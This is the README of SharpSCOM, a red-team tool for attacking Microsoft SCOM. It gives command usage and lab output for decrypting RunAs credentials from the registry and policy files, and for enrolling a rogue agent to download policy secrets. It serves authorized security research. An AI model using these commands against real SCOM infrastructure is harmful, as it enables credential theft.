A C# tool for interacting with Microsoft System Center Operations Manager (SCOM).
This tool has been tested against SCOM Server version 10.22.10118.0.
SSPI integration is provided via the nsspi library from Kevin Thompson (antiduh) released under the BSD-2 license.
█▀ █ █ ▄▀█ █▀█ █▀█ █▀ █▀▀ █▀█ █▀▄▀█
▄█ █▀█ █▀█ █▀▄ █▀▀ ▄█ █▄▄ █▄█ █ ▀ █
Author: Matt Johnson (@breakfix) - SpecterOps - v0.0.1
Usage: SharpSCOM <command> [options]
Commands:
RegisterAgent Register a new agent with SCOM server
RegisterCertificate Assign a certificate to an existing agent
RequestPolicy Request policy from SCOM server
DownloadPolicy Download policy from SCOM server
AutoEnroll Send a multi-part request consisting of RegisterAgent, RegisterCertificate and RequestPolicy and attempt to automatically download the policy
DecryptPolicy Decrypt SecureData section from a policy file
DecryptRunAs Extract and decrypt RunAs credentials from registry
Common Options:
/hostname:<name> Computer hostname (default: current machine)
/managementgroup:<mg> SCOM management group name
/server:<server> SCOM server address
/port:<port> SCOM server port (default: 5723)
/outfile:<file> Output file path
/data:<base64> Base64-encoded data
/key:<xml> RSA private key in XML format
/verbose Enable verbose output
/help Show this help message
Examples:
SharpSCOM AutoEnroll /managementgroup:MG1 /server:scom.domain.com
SharpSCOM DecryptPolicy /data:<base64> /outfile:policy.xml
SharpSCOM DecryptRunAs
The following commands are intended to be run on a server which is currently enrolled with SCOM. In the event RunAs credentials are in use and have been distributed to the server, we can use the below commands to recover plaintext credentials.
Extract and decrypt RunAs credentials from the registry (requires local admin privileges):
SharpSCOM.exe decryptrunas
█▀ █ █ ▄▀█ █▀█ █▀█ █▀ █▀▀ █▀█ █▀▄▀█
▄█ █▀█ █▀█ █▀▄ █▀▀ ▄█ █▄▄ █▄█ █ ▀ █
Author: Matt Johnson (@breakfix) - SpecterOps - v0.0.1
[+] Searching for RunAs credentials in registry...
[+] Found 4 credentials
Username: ludus\opsmgr_action
Password: Password123
Username: ludus\opsmgr_dataread
Password: Password123
Username: ludus\opsmgr_datawrite
Password: Password123
Username: ludus\runas_account
Password: SuperSecure!
[+] Completed
Extract and decrypt RunAs credentials stored inside the SecureData section of an agent policy XML file. By default this can be found at C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\Connector Configuration Cache\$MANAGEMENT_GROUP_NAME$\OpsMgrConnector.Config
This command will locate the current SCOM RunAs certificate in the Local Machine\Microsoft Monitoring Agent store and use the associated private key for decryption.
SharpSCOM DecryptPolicy /data:<base64-encrypted-data>
█▀ █ █ ▄▀█ █▀█ █▀█ █▀ █▀▀ █▀█ █▀▄▀█
▄█ █▀█ █▀█ █▀▄ █▀▀ ▄█ █▄▄ █▄█ █ ▀ █
Author: Matt Johnson (@breakfix) - SpecterOps - v0.0.1
[+] Attempting to decrypt policy data...
[+] Using certificate from store
[+] Found certificate in Microsoft Monitoring Agent store
[+] Subject: O=Microsoft, OU=RunAs Account Encryption, CN=scom-db.ludus.domain
[+] Issuer: O=Microsoft, OU=RunAs Account Encryption, CN=scom-db.ludus.domain
[+] Thumbprint: 88D3E2AC575795E5F5F0E0C2EAFFB5FC386EA52F
[+] Key Size: 2048
[+] RSA key loaded successfully from certificate
[+] SecureData decrypted successfully!
<SecureStorageContainer><SecureStorageReferences><Added><SecureStorageReference Identity="63745834-3e54-936c-1b47-2d632054a177"><TargetSSID>01020202020202020202020202020202020202020200000000000000000000000000000000000000</TargetSSID></SecureStorageReference></Added><Removed /><Modified /></SecureStorageReferences><SecureStorageElements><Added><SecureStorageElement Type="WindowsCredential"><SSID>00C29753F0583B2A1D9D0D81DF24F0FBA31D72B17A00000000000000000000000000000000000000</SSID><Domain>ludus</Domain><UserName>runas_account</UserName><Password>UwB1AHAAZQByAFMAZQBjAHUAcgBlACEA</Password></SecureStorageElement><SecureStorageElement Type="ActionAccountCredential"><SSID>01020202020202020202020202020202020202020200000000000000000000000000000000000000</SSID><Domain>NT Authority</Domain><UserName>LocalSystem</UserName></SecureStorageElement></Added><Removed /><Modified /></SecureStorageElements></SecureStorageContainer>
If we have control of a domain joined host not currently enrolled with SCOM, we can attempt to enroll the device and request an agent policy XML file if the below requirements are met.
Requirements:
- Kerberos authentication as computer account
- Auto enrollment enabled
To enroll a new device, the SCOM agent will send each of the 4 messages below to the SCOM server.
| Command | Description |
|---|---|
RegisterAgent |
Register a new agent with SCOM server |
RegisterCertificate |
Assign a certificate to an existing agent |
RequestPolicy |
Request policy from SCOM server |
DownloadPolicy |
Download policy from SCOM server |
For testing purposes, each of the messages above can be sent individually to the SCOM server using the corresponding command in SharpSCOM.
Note: The SCOM server expects to receive these messages together as part of a multi-message request. In order to reliably receive the agent policy file, we must use the
AutoEnrollcommand which will send theRegisterAgent,RegisterCertificateandRequestPolicycommands together as a multi-part message.
After sending the AutoEnroll command, the response from the SCOM server will be automatically parsed and used to generate the final DownloadPolicy message to download the agent policy XML file.
SharpSCOM.exe autoenroll /managementgroup:SCOM1 /server:scom-om1.ludus.domain /hostname:fake1.ludus.domain /outfile:C:\Users\domainadmin\desktop\policy_new.xml
█▀ █ █ ▄▀█ █▀█ █▀█ █▀ █▀▀ █▀█ █▀▄▀█
▄█ █▀█ █▀█ █▀▄ █▀▀ ▄█ █▄▄ █▄█ █ ▀ █
Author: Matt Johnson (@breakfix) - SpecterOps - v0.0.1
[+] Using Hostname: fake1.ludus.domain (24849d66-ef29-d6c4-4ff1-3e77a3e37a54)
[+] Using Management Group: SCOM1 (f0bc91d0-6de8-1fa8-d6bd-eb98f66672ad)
[+] Server: scom-om1.ludus.domain:5723
[+] Preparing to send multi-part agent message...
[+] Connecting to scom-om1.ludus.domain:5723
[+] Performing Kerberos SSPI authentication...
[+] Authentication successful!
[+] Client authority:
[+] Client context user: LUDUS.DOMAIN\fake1$
[+] Client session key: FF-36-61-D8-3D-53-71-B4-F8-4F-AA-E5-D4-0F-FA-1B-1F-34-15-62-F7-F4-3F-11-16-15-4B-47-1F-25-8B-59
[+] Generating agent registration message
[+] Generating agent certificate message
[+] Generating new agent certificate for fake1.ludus.domain
[+] Subject: CN=fake1.ludus.domain, OU=RunAs Account Encryption, O=Microsoft
[+] Serial Number: 4718FEBFD26B45A24405206C262C1F66
[+] Valid From: 10/26/2025 2:32:48 AM UTC
[+] Valid To: 10/26/2026 2:32:48 AM UTC
[+] Thumbprint: 7AA2A863985A965AA7E42061F5D344D17B68DB23
[+] Public Key (Hex): <REDACTED FOR BREVITY>
[+] Certificate (DER Base64): <REDACTED FOR BREVITY>
[+] Private Key (XML): <RSAKeyValue><Modulus><REDACTED FOR BREVITY></D></RSAKeyValue>
[+] Generating agent policy request
[+] Sending multi-part agent message...
[+] Sending 1174 bytes to server...
[+] [AGENT >>>>>> SCOM] [ENCRYPT] plaintext wrap token (base64): <REDACTED FOR BREVITY>
[+] [AGENT >>>>>> SCOM] [ENCRYPT] zlib decompressed wrap token (base64): <REDACTED FOR BREVITY>
[+] Waiting for server response...
[+] [AGENT <<<<<<<<< SCOM] [DECRYPT] plaintext wrap token (base64): AyBzGQQgBCD+AAAA0QAAAHicm+eqwsHEwMDxjoGBgRmInXz9fdkZGRgMU+ZOiYjOWtL8f0tTQMJz9pOB3j12jrKrVm3W2Gnw/8VfT6A6DqB6oF4G8RQGBnT5tLktKprvj1zz/2hXvvhxVYi32x2gqQwMp1v5QBRDE1SvBTOYy3A2HkIDzRIA0YwMGkAyjcGUwYjBmMGSIQUIzRl0GVIZkoBiIJYJkG3BkAxkWQDFjBgMgSxjICsJKJsKps0YEoEiyUCVegwVDLkMOQyPTyi9SCl/4Nd7NF7jsMvBEgDLhkBP
[+] [AGENT <<<<<<<<< SCOM] [DECRYPT] zlib decompressed wrap token (base64): nkUkCAIAAAjuAAAAAwAAAEJNT00HAQAAMWSdlFhbaqSD/7SCUGDnB8lRS4w+QR2qqrMouTD/6P1JTU9NCAAAAAIAAAAXZAAAyVFLjD5BHaqqsyi5MP/o/WadhCQp78TWT/E+d6PjelRLRtwBAAAAAMuFDgAAAAAAggAAAAIAAAA4AwAAAAAAAM1fAAAAAAAAF2QAEAAAAAABACgAAABmADUAMgAzADkAZABkADcALQBlAGIANQA3AC0ANABlADgAYwAtADgAYgAyADEALQAzAGIAYgA3AGUAYgBiADYAYQAzAGMANAAuAHgAbQBsAOPIIuhkd+BOjcVfKMNEwXQ=
[+] Received 225 bytes from server
[+] Server registration response received
[+] Generating policy download message
[+] server_guid: C9-51-4B-8C-3E-41-1D-AA-AA-B3-28-B9-30-FF-E8-FD
[+] policy_guid: E3-C8-22-E8-64-77-E0-4E-8D-C5-5F-28-C3-44-C1-74
[+] policy_length_1: CD-5F-00-00
[+] policy_length_2: 38-03-00-00
[+] Sending 148 bytes to server...
[+] [AGENT >>>>>> SCOM] [ENCRYPT] plaintext wrap token (base64): AyBzGQQgBCCoAAAAhAAAAHicm+eqwsHMwMAwA4hBtJOvvy87IwODYcrcKRHRWUua/29pCkh4zp42t0VF8/2Ra/4f7coXP64K8QSq44TqEU9hYECXPxno3WPnKLtq1WaNnQb/X/x1crsDNJWBgZUBAnSA2IIZwmZkQAVn4xkYHp9QepFS/sCv92i8xmGXgyUA73oyHQ==
[+] [AGENT >>>>>> SCOM] [ENCRYPT] zlib decompressed wrap token (base64): nkUkCAMAAACYAAAAAwAAAEJNT00HAQAAMWSdlFhbaqSD/7SCUGDnB2adhCQp78TWT/E+d6PjelRJTU9NCQAAAAMAAAAXZAAAZp2EJCnvxNZP8T53o+N6VMlRS4w+QR2qqrMouTD/6P1CRtwBAAAAAAUAAAAAAAAALAAAADgDAAAAAAAAAQAAAAAAAAAAAAAAAAAAAM1fAADjyCLoZHfgTo3FXyjDRMF0
[+] Waiting for server response...
[+] [AGENT <<<<<<<<< SCOM] [DECRYPT] plaintext wrap token (base64): <REDACTED FOR BREVITY>
[+] [AGENT <<<<<<<<< SCOM] [DECRYPT] zlib decompressed wrap token (base64): <REDACTED FOR BREVITY>
[+] Received 8655 bytes from server
[+] Successfully wrote policy XML to C:\Users\domainadmin\desktop\policy_new.xml
[+] Completed
[+] Disconnected from serverAfter receiving the policy file, we can extract the SecureData section and use the private key associated with the agent certificate to decrypt.
SharpSCOM.exe decryptpolicy /data:"DAEAAAECAAAQZgA<REDACTED FOR BREVITY> /key:<RSAKeyValue><Modulus><REDACTED FOR BREVITY></D></RSAKeyValue>
█▀ █ █ ▄▀█ █▀█ █▀█ █▀ █▀▀ █▀█ █▀▄▀█
▄█ █▀█ █▀█ █▀▄ █▀▀ ▄█ █▄▄ █▄█ █ ▀ █
Author: Matt Johnson (@breakfix) - SpecterOps - v0.0.1
[+] Attempting to decrypt policy data...
[+] Using private key from XML
[+] Key Size: 2048
[+] RSA key loaded successfully from XML
[+] SecureData decrypted successfully!
<SecureStorageContainer><SecureStorageReferences><Added /><Removed /><Modified /></SecureStorageReferences><SecureStorageElements><Added><SecureStorageElement Type="WindowsCredential"><SSID>00C29753F0583B2A1D9D0D81DF24F0FBA31D72B17A00000000000000000000000000000000000000</SSID><Domain>ludus</Domain><UserName>runas_account</UserName><Password>UwB1AHAAZQByAFMAZQBjAHUAcgBlACEA</Password></SecureStorageElement></Added><Removed /><Modified /></SecureStorageElements></SecureStorageContainer>
This project is licensed under the BSD 3-Clause license - see the LICENSE file for details.
This tool is provided for educational and authorized security testing purposes only. Ensure you have proper authorisation before using this tool against any SCOM infrastructure.
Matt Johnson (@breakfix) - SpecterOps
See the accompanying blog post here https://specterops.io/blog/2025/12/10/scommand-and-conquer-attacking-system-center-operations-manager-part-2/